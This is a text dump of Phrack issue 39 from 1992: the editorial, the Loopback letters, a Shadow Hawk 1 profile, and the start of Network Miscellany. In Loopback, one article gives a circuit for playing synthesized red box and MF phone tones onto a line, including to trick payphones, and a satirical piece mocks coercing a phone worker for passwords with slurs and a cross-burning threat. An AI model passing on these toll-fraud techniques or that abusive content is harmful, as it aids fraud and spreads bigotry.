Anda di halaman 1dari 123

==Phrack Inc.

==

Volume Four, Issue Thirty-Nine, File 1 of 13

Issue XXXIX Index


___________________

P H R A C K 3 9

June 26, 1992


___________________

~You're Not Dealing With AT&T~

Welcome to Phrack 39. This will be the final issue before SummerCon '92.
Details of SummerCon will appear in our special anniversary issue due late this
summer -- Phrack 40. Rumor also has it that the next issue of Mondo 2000 will
contain some type of coverage about SummerCon as well!

Phrack has been receiving an enormous amount of mail containing questions and
comments from our readers and we really appreciate the attention, but we don't
know what to do with it all. Phrack Loopback was created to address letters of
this sort, but in a lot of cases, the senders of the mail are not indicating if
their question is to be posted to Loopback or if they are to be identified as
the author of their question in Loopback.

Dispater has been moving all across the country over the past couple of months,
which is the primary reason for the delay in releasing this issue. However,
now that he is settled, the fun is about to begin. He will be responding to
your mail very soon and hopefully this will all be sorted out by issue 40.
For right now, you can enjoy a variety of special interest articles and letters
in this issue's Loopback, including "A Review of Steve Jackson Games' HACKER"
by Deluge. Special thanks goes out to Mentor and Steve Jackson for a copy of
the game and the totally cool looking poster. "Association of Security
Sysadmins" is my favorite! ;)

Another problem situation that needs to be mentioned has to do with would-be


subscribers. For some reason the "phracksub@stormking.com" account has been
receiving hundreds of requests from people who want to be added to the
subscription list. This isn't how it works. You must subscribe yourself, we
can't and won't do it for you. The instructions are included later in this
file. Up till this point we have been informing people of their error and
mailing them the instructions, but we will ignore these requests from now on.
Anyone with an intelligence level high enough to enjoy Phrack should be capable
of figuring out how to subscribe.

Phrack Pro-Phile focuses on Shadow Hawk 1 -- The first hacker ever to be


prosecuted under the Computer Fraud & Abuse Act of 1986. A lot of people don't
realize that Robert Morris, Jr. was not the first because Shadow Hawk 1 was
tried as a minor and therefore a lot of details in his case are not publicly
known. Something to point out however is that the same people (William J. Cook
and Henry Klupfel) that were responsible for prosecuting SH1 in 1989, came back
in 1990 to attack Knight Lightning... but this time the government and Bellcore
didn't fare as well and now both Cook and Klupfel (among others) are being sued
in Federal Court in Austin, Texas (See Steve Jackson Games v. United States).
Now, before anyone starts flying off their keyboards screaming about our
article "Air Fone Frequencies" by Leroy Donnelly, we will let you know what's
what. Yes, the same article did recently appear in Informatik, however, both
publications received it from the same source (Telecom Digest) and Informatik
just had an earlier release date. At Phrack, we feel that the information was
interesting and useful enough that our readers deserved to see it and we do not
assume by any means that everyone on the Phrack list is also a reader of
publications like Telecom Digest or Informatik.

Phrack's feature article in this issue is "The Complete Guide To The DIALOG
Information Network" by Brian Oblivion. Our undying gratitude to Mr. Oblivion
for his consistency in providing Phrack and its readers with entertaining
quality articles... and we're told that the best is yet to come.

Longtime fans of Phrack might recall that Phrack 9 had an article on Dialog
services and it also had an article on Centigram Voice Mail. Now 30 issues
later, both topics are resurrected in much greater detail.

You will also note that the Centigram article in this issue is penned under the
pseudonym of ">Unknown User<," a name that was adopted from the anonymous
posting feature of the Metal Shop Private bulletin board (the birthplace of
Phrack, sysoped by Taran King during 1985-1987). The name ">Unknown User<" has
traditionally been reserved for authors who did not wish to be identified in
any capacity other than to the Phrack editors. In this case, however, even the
staff at Phrack has absolutely no idea who the author of this file is because
of the unique way of SMTP Fakemail it was delivered.

No Pirates' Cove in this issue. Be watching for the next Pirates' Cove in
Phrack 40.

- - - - - - - -

Knight Lightning recently spoke at the National Computer Security Association's


Virus Conference in Washington, D.C. His presentation panel which consisted
of himself, Winn Schwartau (author of Terminal Compromise), and Michael
Alexander (chief editor of ISPNews and formally an editor and reporter for
ComputerWorld) was very well received and the people attending the conference
appeared genuinely interested in learning about the hacking community and
computer security. KL remarked that he felt really good about the public's
reaction to his presentation because "its the first time, I've agreed to be on
one of these panels and someone in the audience hasn't made accusatory or
derogatory remarks."

"It's inappropriate for you to be here."

This was the warm reception KL and a few others received upon entering the
room where the secret midnight society anti-virus group was holding a meeting.
It appears that a small number of anti-virus "experts" have decided to embark
on a mission to rid the country of computer bulletin boards that allow the
dissemination of computer viruses... by any means possible, including the
harassment of the sysops (or the sysops' parents if the operator is a minor).

At Phrack, some of us feel that there are no good viruses and are opposed to
their creation and distribution. Others of us (e.g. Dispater) just think
viruses are almost as boring as the people who make a carear out of
exterminating them. However, we do not agree with the method proposed by this
organization and will be watching.
- - - - - - - - - -

Special thanks for help in producing this issue:

Beta-Ray Bill Crimson Flash (512)


Datastream Cowboy Deluge
Dispater, EDITOR Dokkalfar
Frosty (of CyberSpace Project) Gentry
The Iron Eagle (of Australia) JJ Flash
Knight Lightning, Founder Mr. Fink
The Omega [RDT][-cDc-] The Public
Rambone Ripper of HALE
Tuc White Knight [RDT][-cDc-]

We're Back and We're Phrack!

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

HOW TO SUBSCRIBE TO PHRACK MAGAZINE

The distribution of Phrack is now being performed by the software called


Listserv. All individuals on the Phrack Mailing List prior to your receipt of
this letter have been deleted from the list.

If you would like to re-subscribe to Phrack Inc. please follow these


instructions:

1. Send a piece of electronic mail to "LISTSERV@STORMKING.COM". The mail


must be sent from the account where you wish Phrack to be delivered.

2. Leave the "Subject:" field of that letter empty.

3. The first line of your mail message should read:


SUBSCRIBE PHRACK <your name here>

4. DO NOT leave your address in the name field!


(This field is for PHRACK STAFF use only, so please use a full name)

Once you receive the confirmation message, you will then be added to the Phrack
Mailing List. If you do not receive this message within 48 hours, send another
message. If you STILL do not receive a message, please contact
"SERVER@STORMKING.COM".

You will receive future mailings from "PHRACK@STORMKING.COM".

If there are any problems with this procedure, please contact


"SERVER@STORMKING.COM" with a detailed message.

You should get a conformation message sent back to you on your subscription.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Table Of Contents
~~~~~~~~~~~~~~~~~
1. Introduction by Dispater and Phrack Staff 12K
2. Phrack Loopback by Phrack Staff 24K
3. Phrack Pro-Phile on Shadow Hawk 1 by Dispater 8K
4. Network Miscellany V by Datastream Cowboy 34K
5. DIALOG Information Network by Brian Oblivion 43K
6 Centigram Voice Mail System Consoles by >Unknown User< 36K
7. Special Area Codes II by Bill Huttig 17K
8. Air Fone Frequencies by Leroy Donnelly 14K
9. The Open Barn Door by Douglas Waller (Newsweek) 11K
10. PWN/Part 1 by Datastream Cowboy 30K
11. PWN/Part 2 by Datastream Cowboy 27K
12. PWN/Part 3 by Datastream Cowboy 29K
13. PWN/Part 4 by Datastream Cowboy 29K

Total: 314K

"Phrack. If you don't get it, you don't get it."

phracksub@stormking.com

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Somebody Watching? Somebody Listening?

*** Special Announcement ***

KNIGHT LIGHTNING TO SPEAK AT SURVEILLANCE EXPO '92


Washington, DC

The Fourth Annual International Surveillance and Countersurveillance Conference


and Exposition focusing on Information Security and Investigations Technology
will take place at the Sheraton Premiere in Tysons Corner (Vienna), Virginia on
August 4-7.

The seminars are on August 7th and include Craig Neidorf (aka Knight Lightning)
presenting and discussing the following:

- Are law enforcement and computer security officials focusing their


attention on where the real crimes are being committed?

- Should security holes and other bugs be made known to the public?

- Is information property and if so, what is it worth?

Experience the case that changed the way computer crime is investigated
and prosecuted by taking a look at one of America's most talked about
computer crime prosecutions: United States v. Neidorf (1990).

Exonerated former defendant Craig Neidorf will discuss the computer


"hacker" underground, Phrack newsletter, computer security, and how it all
came into play during his 7 month victimization by some of our nation's
largest telephone companies and an overly ambitious and malicious federal
prosecutor. Neidorf will speak about his trial in 1990 and how the court
dealt with complex issues of First Amendment rights, intellectual
property, and criminal justice.

Security professionals, government employees, and all other interested parties


are invited to attend. For more information please contact:

American Technology Associates, Inc.


P.O. Box 20254
Washington, DC 20041
(202)331-1125 Voice
(703)318-8223 FAX
_______________________________________________________________________________

==Phrack Inc.==

Volume Four, Issue Thirty-Nine, File 2 of 13

[-=:< Phrack Loopback >:=-]

By Phrack Staff

Phrack Loopback is a forum for you, the reader, to ask questions, air
problems, and talk about what ever topic you would like to discuss. This is
also the place Phrack Staff will make suggestions to you by reviewing various
items of note; magazines, software, catalogs, hardware, etc.
_______________________________________________________________________________

A Review of Steve Jackson Games' HACKER


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Deluge

They had to get around to it eventually. While I was scanning the game section
at the not-so-well-stocked game and comic store where I shop on occasion, I saw
something that caught my eye: A game called "Hacker" by Steve Jackson Games.

What you see on the cover gives you a clue that this game is a bit more than
the typical trash we see about hackers. Here we have a guy with a leather
jacket with a dinosaur pin, John Lennon shades, a Metallica shirt, and a really
spiffy spiked hairdo. This guy has an expression with a most wicked grin, and
his face is bathed in the green glow of a monitor. Various decorations in the
room include a model rocket, a skateboard, a pizza box, and a couple of Jolt
Cola cans. Behind him, hanging on his wall, are a couple of posters, one which
says, "Legion of Doom Internet World Tour," and another which says, "Free the
Atlanta Three." On his bookshelf, we see a copy of Neuromancer, Illuminati
BBS, and The Phoenix-- (I assume "Project" follows, and don't ask me why this
guy has BBSes in his bookshelf). Finally, there's a note tacked to the LOD
poster that says "PHRACK SummerCon CyberView, St. Louis" which appears to be an
invitation of some kind.

This struck me as quite interesting.

Twenty bucks interesting, as it turns out, and I think it was twenty well
spent. Now don't tell me Steve Jackson Games has no significance for you
(sigh). Ok, here is how Steve tells it (in the intro to the game):

-----

"In 1990, Steve Jackson Games was raided by the U.S. Secret Service during a
'hacker hunt' that went disastrously out of control. We lost several
computers, modems, and other equipment. Worse, we lost the manuscripts to
several uncompleted games, most notably _GURPS Cyberpunk_, which a Secret
Service agent the next day called 'a handbook for computer crime.' The company
had to lay off half its staff, and narrowly avoided bankruptcy.

"Eventually we got most of our property back (though some of it was damaged or
destroyed). The Secret Service admitted that we'd never been a target of their
investigation. We have a lawsuit pending against the officials and agencies
responsible.

"But since the day of the raid, gamers have been asking us, 'When are you going
to make a game about it?' Okay. We give up. Here it is. Have fun."

-----

Weeeell...everybody naturally wants to look as good as they can, right? For


the real lowdown on the whole situation, a scan through some old CUDs would be
in order, where you could find a copy of the warrant which authorized this
raid. I can tell you that Loyd Blankenship is the author of SJG's _GURPS
Cyberpunk_, so draw your own conclusions.

Hacker is played with cards. This does NOT, in my view, make it a card game,
though it is advertised that way. It's pretty similar to Illuminati, requiring
a lot of diplomacy, but it has a totally different flavor.

The goal here is to become the mondo superhacker king of the net by getting
access on twelve systems. You build the net as you go along, upgrading your
system, hacking systems, and looking for ways to screw your fellow hackers so
they can't be king of the net before you can get around to it. While the
hacking aspect is necessarily resolved by a dice roll, the other aspects of
this game ring true. They distinguish between regular and root access on
systems, have specific OSes, specific net types, NetHubs, secret indials, back
doors, and, of course, the feds, which range from local police to combined
raids from the FBI and other government authorities.

This is a good game all on its own. It's fun, it has a fair amount of
strategy, lots of dirty dealing, and a touch of luck to spice things up. And
if things get too hairy and blood is about to flow, they inevitably cool down
when someone uses a special card. Quite a few of these are funny as hell.
Some examples:

Trashing: Somebody threw away an old backup disk. Bad idea. You can leave
them e-mail about it...from their own account.

Get A Life: A new computer game ate your brain. 100 hours later, you beat it,
and you're ready to get back to hacking, but you get only one hack
this turn. There is another one of these about meeting a member
of the opposite sex and briefly entertaining the notion that there
is more to life than hacking.

Original Manuals: The official system manuals explain many possible security
holes. This is good. Some system administrators ignore
them. This is bad. They usually get away with it because
most people don't have the manuals. This is good. But
YOU have a set of manuals. This is very interesting.

Social Engineering: "This is Joe Jones. My password didn't work. Can you
reset it to JOE for me?" There is another one of these
that says something about being the phone company checking
the modem line, what's your root password please.

And my favorite, a card designed to be played to save yourself from a raid:

Dummy Equipment: The investigators took your TV and your old Banana II, but
they overlooked the real stuff! No evidence, no bust -- and
you keep your system.
As you can see, this game goes pretty far toward catching the flavor of the
real scene, though some of it is necessarily stereotypical. Well, enough
praise. Here are a couple of gripes.

The game is LONG. A really nasty group of players can keep this going for
hours. That isn't necessarily a bad thing, but be forewarned. A few
modifications to shorten it up are offered, but the short game is a little like
masturbating. Just not as good as the real thing.

There was too much work to get the game ready to play. I've gotten used to
some amount of setting up SJGs, and believe me, I would not have bought more
unless they were good, and they always are, but the setup has not usually been
such a pain. HACKER has a lot of pieces, and a lot of them come on a single
page, requiring you to hack them out with scissors and hope you don't do
something retarded like cut the wrong thing off. Once I got done with this,
everything was cool, but this was a real pain.

So, overall, what do I think? Four stars. If you play games, or if you're
just massively hip to anything about hacking, get this game. You're gonna need
at least three players, preferably four or five (up to six can play), so if
you only know one person, don't bother unless you have some hope of getting
someone else to game with you.

And when Dr. Death or the K-Rad Kodez Kid calls you up and wonders where you've
been lately, just tell him you're busy dodging feds, covering your tracks, and
hacking for root in every system you find in your quest to call yourself king
of the net, and if he doesn't support you...well, you know what to do with
posers who refuse to believe you're God, don't you?

Muahahahahahahaahaha!
_______________________________________________________________________________

CPSR Listserv
~~~~~~~~~~~~~
Computer Professionals for Social Responsibility (CPSR) has set up a list
server to (1) archive CPSR-related materials and make them available on
request, and (2) disseminate relatively official, short, CPSR-related
announcements (e.g., press releases, conference announcements, and project
updates). It is accessible via Internet and Bitnet e-mail. Mail traffic will
be light; the list is set up so that only the CPSR Board and staff can post to
it. Because it is self-subscribing, it easily makes material available to a
wide audience.

We encourage you to subscribe to the list server and publicize it widely,


to anyone interested in CPSR's areas of work.

To subscribe, send mail to:

listserv@gwuvm.gwu.edu (Internet) OR
listserv@gwuvm (Bitnet)

Your message needs to contain only one line:

subscribe cpsr <your first name> <your last name>

You will get a message that confirms your subscription. The message also
explains how to use the list server to request archived materials (including
an index of everything in CPSR's archive), and how to request more information
about the list server.

Please continue to send any CPSR queries to cpsr@csli.stanford.edu.

If you have a problem with the list server, please contact the administrator,
Paul Hyland (phyland@gwuvm.gwu.edu or phyland@gwuvm).

We hope you enjoy this new service.


_______________________________________________________________________________

TRW Allows Inspection


~~~~~~~~~~~~~~~~~~~~~
According to USA Today, as of April 30, you can get a free copy of your TRW
credit report once a year by writing to:

TRW Consumer Assistance


P.O. Box 2350
Chatsworth, CA 91313-2350

Include all of the following in your letter:

- Full name including middle initial and generation such as Jr, Sr, III etc.
- Current address and ZIP code.
- All previous addresses and ZIPs for past five years.
- Social Security number.
- Year of birth.
- Spouse's first name.

- A photocopy of a billing statement, utility bill, driver's license or other


document that links your name with the address where the report should be
mailed.
_______________________________________________________________________________

The POWER Computer Lives!


~~~~~~~~~~~~~~~~~~~~~~~~~
Do the words of the prophet Abraham Epstein ring true? (Remember him from his
correspondence in Phrack 36 Loopback?)

If you don't believe that The IBM/TV Power Computer and is attempting to take
over the world then read the following and judge for yourself.

o IBM is the worlds largest corporation.

o IBM has more in assets than most small countries.

o In 1991 IBM and it's arch enemy, Apple Computer, have joined forces to build
the POWER computer.

o The POWER computer will replace all existing Macintosh, PS/2, and
RS/6000 machines.

o The POWER architecture will be licenced to third-party companies in order


that they may build their own POWER computers.

o With both Apple Computer (QuickTime) and IBM (Ultimedia) advancing their
work on Multimedia, it can only mean that the POWER computer will speak
through TV.
- - - - - - - - -

Here are some quotes from Harley Hahn of IBM's Advanced Workstation Division:

"PowerOpen is a computing architecture based on AIX and the POWER


Architecture. To that we've added the PowerPC architecture [a low-
end implementation if POWER ] and the Macintosh interface and
applications."

"Our goal is to create the major RISC computing industry standard


based on the PowerPC architecture and the PowerOpen environment."

"Eventually all our workstations will use POWER"

- - - - - - - - -

Here's a quote from Doug McLean of Apple Computer:

"It is our intention to replace the 68000 in our entire line of


Macintosh computers with PowerPC chips."

- - - - - - - - -

The PROPHECY IS COMING TRUE. We have no time to lose. Unless we act quickly
the world will come to an abrupt end as the POWER COMPUTER passes wind on all
of us.

Abraham Epstein [Big Daddy Plastic Recycling Corporation]


[Plastic Operations With Energy Resources (POWER)]
_______________________________________________________________________________

Major Virus Alert


~~~~~~~~~~~~~~~~~
George Bush Virus - Doesn't do anything, but you can't get rid of it
until November.
Ted Kennedy Virus - Crashes your computer, but denies it ever happened.
Warren Commission Virus - Won't allow you to open your files for 75 years
Jerry Brown Virus - Blanks your screen and begins flashing an 800 number.
David Duke Virus - Makes your screen go completely white.
Congress Virus - Overdraws your disk space.
Paul Tsongas Virus - Pops up on Dec. 25 and says "I'm Not Santa Claus."
Pat Buchanan Virus - Shifts all output to the extreme right of the screen.
Dan Quayle Virus - Forces your computer to play "PGA TOUR" from 10am to
4pm, 6 days a week
Bill Clinton Virus - This virus mutates from region to region. We're not
exactly sure what it does.
Richard Nixon Virus - Also know as the "Tricky Dick Virus." You can wipe
it out, but it always makes a comeback.
H. Ross Perot Virus - Same as the Jerry Brown virus, only nicer fonts are
used, and it appears to have had a lot more money put
into its development.
_______________________________________________________________________________

AUDIO LINKS
~~~~~~~~~~~
By Mr. Upsetter
It all started with my Macintosh...

Some time ago I had this crazy idea of connecting the output from the audio
jack of my Macintosh to the phone line. Since the Macintosh has built in sound
generation hardware, I could synthesize any number of useful sounds and play
them over the phone. For instance, with a sound editing program like
SoundEdit, it is easy to synthesize call progress tones, DTMF and MF tones, red
box, green box, and other signalling tones. So I set out to do exactly this.
I created a set of synthesized sounds as sound resources using SoundEdit. Then
I wrote a HyperCard stack for the purpose of playing these sounds. Now all I
needed was a circuit to match the audio signal from the headphone jack of my
Mac to the phone line.

How The Circuit Works


~~~~~~~~~~~~~~~~~~~~~
I designed a simple passive circuit that does the job quite well. Here is the
schematic diagram.

+------+ T1 +------+
o-----| R1 |-----o------o--------(| |)-----| C1 |-----o-----o
+------+ +| -| (| |) +------+ |
+---+ +---+ (| |) +---+
to Mac | D | | D | 8 (| |) 500 |VR | to
headphone | 1 | | 2 | ohm (| |) ohm | 1 | phone
jack +---+ +---+ (| |) +---+ line
-| +| (| |) |
o------------------o------o--------(| |)------------------o-----o

C1-.22 uF, 200V


D1,D2- 1N4148 switching diode
R1-620 ohm, 1/4W
T1- 8 ohm to 500 ohm audio transformer, Mouser part 42TL001
VR1-300V MOV, Mouser part 570-V300LA4

VR1 is a 300V surge protector to guard against transient high voltages.


Capacitor C1 couples the phone line to transformer T1, blocking the phone
line's DC voltage but allowing the AC audio signal to pass. The transformer
matches the impedance of the phone line to the impedance of the headphone jack.
Diodes D1 and D2 provide clipping for additional ringing voltage protection
(note their polarity markings in the schematic). They will clip any signal
above 7 volts. Resistor R1 drops the volume of the audio signal from the Mac
to a reasonable level. The end result is a circuit that isolates the Mac from
dangerous phone line voltages and provides a good quality audio link to the
phone line.

Building and Using the Circut


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This simple circuit is easy to build (if you're handy with electronics). I
personally prefer to solder the circuit together. A length of shielded audio
cable with a 1/8 inch mono plug on one end should be connected to the audio
input end of the circuit. A standard RJ11 phone jack should be connected to
the phone line end of the circuit. Although this circuit will protect against
dangerous phone line voltages, it is best to disconnect it when not in use.
You just don't want to risk anything bad happening to your brand new Quadra
900, right?
Once you have an audio link between your Mac and the phone line, the
applications are limitless. Use HyperCard's built-in DTMF dialing to dial for
you, or build a memory dialer stack. Talk to people with Macintalk. Play your
favorite Ren and Stimpy sounds for your friends. Play a ringback tone to
"transfer" people to an "extension". Build and use a set of synthesized MF
tones. Try to trick COCOT's with synthesized busy and reorder signals.

But Wait, There Is More...


~~~~~~~~~~~~~~~~~~~~~~~~~~
So you say you don't own a Macintosh? That is ok, because the circuit can be
used with other devices besides your Mac. You can use it with the 8 ohm
headphone output from tape recorders, radios, scanners, etc. You could also
probably use it with any other computer as long as you had the proper audio D/A
hardware and software to create sounds.

All parts are available from Mouser Electronics. Call 800-346-6873 for a free
catalog.
_______________________________________________________________________________

Thank You Disk Jockey!


~~~~~~~~~~~~~~~~~~~~~~
Date: May 22, 1992
From: Sarlo
To: Phrack
Subject: The Disk Jockey

I was searching through some Phracks (issues 30-38), just checking them out and
noticed something. It's small and insignificant, I guess, but important to me
all the same.

I noticed in Disk Jockey's Prophile (Phrack 34, File 3) that he "Never got any
thanks for keeping his mouth shut."..I dunno how to get ahold of him or
anything, but if you drop a line to him sometime, tell him I said "thanks."

-Sarlo
_______________________________________________________________________________

An Upset Reader Responds To Knight Lightning and Phrack


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Mon, 20 Apr 92 16:57 GMT
From: "Thomas J. Klotzbach" <0003751365@mcimail.com>
To: Knight Lightning <kl@stormking.com>
Subject: In response to your comments of Phrack Vol 4, Issue 37, File 2 of 14

Hi,

I have a lot of respect for Phrack and all the work they are doing to
promote an understanding of the Computer Underground. But your comments in the
latest issue of Phrack are what I would like to comment on.

You say:

"In short -- I speak on behalf of the modem community in general,


'FUCK OFF GEEK!' Crawl back under the rock from whence you came
and go straight to hell!"

First, you don't speak for me and about five other people at this college.
I have maintained throughout that the ONLY way to further the efforts of the
Computer Underground is to destroy them with logic - not with creton-like
comments. Yes, you are entitled to your say - but why not take this Dale Drew
person and destroy him with logic? The minute that you descend to the level
Dale Drew operates from makes you look just as ridiculous as him.

In my opinion, you came off very poorly in the exchange with Dale Drew.

Thomas J. Klotzbach MCI Mail: 375-1365


Genesee Community College Internet: 3751365@mcimail.com
Batavia, NY 14020 Work: (716) 343-0055 x358

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Dear Mr. Klotzbach,

>From all of us at Phrack, this is our reply to your recent email...

*******************************************************************************

Cyber-Redneck & Shitkickin' Jim's


GUIDE TO MANLY HACKING

A Lod/GoD Presentation
Legion of d0oDeZ / Gardeners of Doom!

"You can have my encryption algorithm,


when you pry it from my cold dead fingers!"

*******************************************************************************

NOW BOYS... first of all, you gotta git yerself a pickup truck. Shitkickin'
Jim's got one. And you gotta get a bedliner, a toolbox, a gunrack, and a CB.
For decoration, you have to get a confederate flag Hank Williams Jr. license
plate, or a Harley Davidson license plate, at your option. You also gotta get
an NRA sticker for the back, and the Bassmaster fishing sticker (you know, the
one that's has a fish on it). The most mandatory requirement are two antennaes
for your CB which are mounted on each of the side view mirrors.

Now that you have your pickup truck/hackermobile, you gotta rip out the
dashboard and mount a Data General processing unit in the front seat, cuz
that's a manly-sounding computer name, not some pussy sounding 'puter. You
also have to get an Anchorman direct-connect modem, cuz that's the only thing
left that your battery will be able to power.

Not only do you have to have a pickup truck, but you gotta have rollbars, with
foglights, armed with KC light covers so that you can see at night while you're
trashing.

THE MANLY WAY FOR A NIGHT OF HACKING

NOTE: Before you begin any journey in the hackmobile, you must get a six pack
of Budweiser, and a carton of Marlboro reds. It's mandatory.

Call up your buddy who owns his own trash business. If you are a real man, ALL
of your friends will work in this business. Get him to take the company truck
out (the deluxe model -- the Hercules trash truck, the one with the forklift on
the front).

HOW REAL MEN GO TRASHING

Drive down to your local Bell office or garage, and empty all of the dumpsters
into the trashtruck, by way of the convenient forklift. This method has
brought both me and Shitkickin' Jim much luck in the way of volume trashing.

Now that you have all of your trash, go back and dump it in your backyard. If
you are a real man, no one will notice. Dump it between the two broke down
Chevette's, the ones that all the dogs will sleep under, next to the two
barrels of wire.

Go through the trash and find out who the geek is that is the switchman at the
central office. This shouldn't be hard. It's the little squiggly letters at
the bottom of the page.

Next, drive to his house. Pull your truck into his front yard. Threaten him
with the following useful phrase:

"HAY FAY-GUT! WUT IS THE PASSWORD TO THE LOCAL COSMOS DIALUP?"

"IFFIN YOU DON'T TELL ME, I'M GONNA RUN OVER YOUR PIECE OF SHIT RICE-BURNING
COMMUNIST JAPANESE CAR WITH MY 4 BY 4 PICKUP TRUCK, GAWDDAMIT!"

Then spit a big, brown, long tobaccoe-juice glob onto his shirt, aiming for the
Bell logo. Should he withhold any information at this point, git out of yer
truck and walk over to him. Grab him by his pencil neck, and throw him on the
ground. Place your cowboy boot over his forehead, and tell him your going to
hogtie his ass to the front of your 4 by 4 and smash him into some concrete
posts. At this point, he will give in, especially noticing the numerous guns
in the gunrack.

WHAT TO DO WITH THE INFORMATION THAT YOU HAVE COVERTLY OBTAINED

Don't even think about using a computer. Make him log on to his terminal at
home, and make him do whatever you like. Read a copy of JUGGS magazine, or
High Society, or Hustler, while at the same time exhibiting your mighty hacker
power. Enjoy the newfound fame and elitism that you will receive from your
friends and loved ones. GOD BLESS AMERICA!

*****************************************************

This file was brought to you by Cyber-Redneck a/k/a Johnny Rotten, and
Shitkickin' Jim a/k/a Dispater.

Iffin you don't like this here file, we will burn a cross in your yard, and
might even tell the BellCo geek to cut your line off. He's still tied up in
Shitkickin' Jim's basement.
_______________________________________________________________________________

==Phrack Inc.==

Volume Four, Issue Thirty-Nine, File 3 of 13

==Phrack Pro-Phile==
Written by Dispater

Created by Taran King (1986)

Welcome to Phrack Pro-Phile. Phrack Pro-Phile is created to bring info to


you, the users, about old or highly important/controversial people. This
month, I bring to you the one of the earlier hackers to make headlines and
legal journals due to computer hacking...

(_>Shadow Hawk 1<_)

_______________________________________________________________________________

Personal
~~~~~~~~
Handle: (_>Shadow Hawk 1<_)
Call me: Herb
Past handles: Feyd Rautha, Captain Beyond, Mental Cancer
Handle origin: Stolen from the name of an 8-bit Atari 800 game that
seemed to be written in the language RGL (anyone got it
for the IBM? ;-) ).
Date of Birth: August 6, 1970
Age at current date: 21
Height: 6'2"
Weight: 190 lbs.
Eye color: Gray
Hair color: Brown
Computer: 386/Linux

-------------------------------------------------------------------------------

I started working with computers in the 6th grade with an Atari 800 and
a cassette drive. I added a modem and a disk drive and started researching
other computer systems [checking out other hacker's conquests ;-) ].
Eventually, I decided that UNIX was to be the OS of choice.

As a child, I was always curious about stuff in my own reality, so


naturally, when computers became available...

I first owned an Atari 800, then an Atari ST 1040, followed by a short-


lived Unix-PC 3B1, and a lame 20MHz 386. Currently, I have a 33MHz 386. Most
of my hacking-type knowledge came from a text file that listed a few Unix
defaults; I used those to go and learn more on my own. Other OSes, I just
hacked at random 8-).

I started out with systems that had already been penetrated and I built up
my own database of systems from there. I wasn't too clever in the beginning,
though, and lost a few systems to perceptive sys-admins.

I specialized in Unix, though I enjoyed toying with obscure systems


(RSX-11, Sorbus Realtime Basic, etc.)

In the hack/phreak world, I used to hang out with The Prophet, The Serpent
(Chicago), The Warrior, and others for short periods of time, who shall remain
nameless.

As far as what were memorable hack/phreak BBSes, I'd have to say none...
Not that there weren't any, but I have just forgotten them all.

My accomplishments in the phreak/hack world include writing a few text


files, typing in a few books, getting in lots of systems, and learning a bit
about the Unix OS. Other than that, absolutely nothing; my life is computers!
(NOT!)

I _was_ associated with the J-Men a few years back, but that's the only
hack/phreak group that I ever had anything to do with.

I was busted for overzealousness in penetrating AT&T computer networks and


systems. I stupidly made calls from my unprotected home phone. I got caught
trying to snag Unix SysV 3.5 68K kernel source.

I had already given up the practice of sharing information when I realized


how quickly systems went away after their numbers and logins were posted 8-).
After I got busted, I decided it might be best to limit my hacking to those
strata of reality on which it is not (yet) prohibited to hack ;-) .

In real life, I originally was going to be an EE/CS major in school, but


now, I'm leaning towards math/modeling/nonlinear dynamics. Work when necessary
8-|.

I'm into making music, drawing strange pictures, and exploring the nether
regions of physical reality. Occasionally I am seen at sci-fi conventions in
various forms and personages.

I feel seriously against taking things too seriously. If you can master
that, you've got it all beat!

-------------------------------------------------------------------------------

(_>Shadow Hawk 1<_)'s Favorite Things


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Work: Nihilist Ontologist.
Cars: Fast & Loud.
Foods: I like a little of every cuisine, except those involving large
amounts of horseradish, beets, raw tomatoes, etc.
Music: Ecumenical.
Authors: R.A. Wilson is good for kicks; other than that I haven't read
much fiction lately. Lots of non-fiction.
Books: Illuminatus, Stranger in a Strange Land, Man or Matter, Godel
Escher and Bach, The Book of the SubGenius.
Performers: The people at NASA, the U.S. government beings at Washington,
the nightly news.
Sex: Yes.

Most Memorable Experience


~~~~~~~~~~~~~~~~~~~~~~~~~
Coming home to a house full of Secret Service, FBI, NSA, DIA, and AT&T agents
after getting really stoned with some neighborhood friends, and then having
them take everything electronic that didn't appear to be a household appliance
EXCEPT the obviously stolen/dangerous items: a digital power meter, a He-Ne
laser, and jars of chemicals for making bombs. HUMOR AT ITS FINEST!

Some People to Mention


~~~~~~~~~~~~~~~~~~~~~~
o Thanks to Bill Cook for leaving no stone unturned in my personal life!
o Thanks to "my" lawyer, Karen Plant, for leaving MANY stones unturned in
helping to decide my fate!
o Thanks to the U.S. Federal Justice System for sentencing me to a 9 months
in a "juvenile facility" (as well as confiscating thousands of dollars of
stuff, some legal & some not) while allowing burglars, politicians, and
virus-authors to go free with a slap on the wrist!
o Thanks for Operation Sun-Devil, without which, the venerable Ripco BBS
would still be in its first incarnation!

A Few Other Things


~~~~~~~~~~~~~~~~~~
I'd like to thank all the great beings at Lunatic Labs for not removing my
account while I was sight-seeing in South Dakota. HI! to all my TRUE friends
(you know who you are) and all the FALSE ones too! Where would I be now
without you? Thanks to all those who love me enough to want to control my
mind. And, of course, THANKS to the hack/phreak community in general for not
only becoming, as most countercultures do, decadent and passe, but also for
still bugging me after all these years!

The Future: well, if reality doesn't cave itself in TOO badly with all of the
virtuality that's on its way, it should be a great time for all to play with
the "net!"

Inside jokes: HALOHALOHALOHALOHALOHALOHALOHALOHALOSKSKSKSKSKSKSKSKSKSKSKSKSK


eaerlyeaerlyeaerlyeaerlyeaerlyeaerly... the gwampismobile shall ride again!

-------------------------------------------------------------------------------

Of the general population of phreaks you have met, would you consider most
phreaks, if any, to be computer geeks?

Well, as far as geeking goes, all are free to pursue their interests. It
is important to remember that social evolution and mental evolution do not
necessarily occur simultaneously, or instantaneously (usually).
_______________________________________________________________________________

==Phrack Inc.==

Volume Four, Issue Thirty-Nine, File 4 of 13

Network Miscellany V
Compiled from Internet Sources
by Datastream Cowboy

Network Miscellany created by Taran King

University of Colorado Netfind Server


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Trying 128.138.243.151 ...


Connected to bruno.cs.colorado.edu.
Escape character is '^]'.

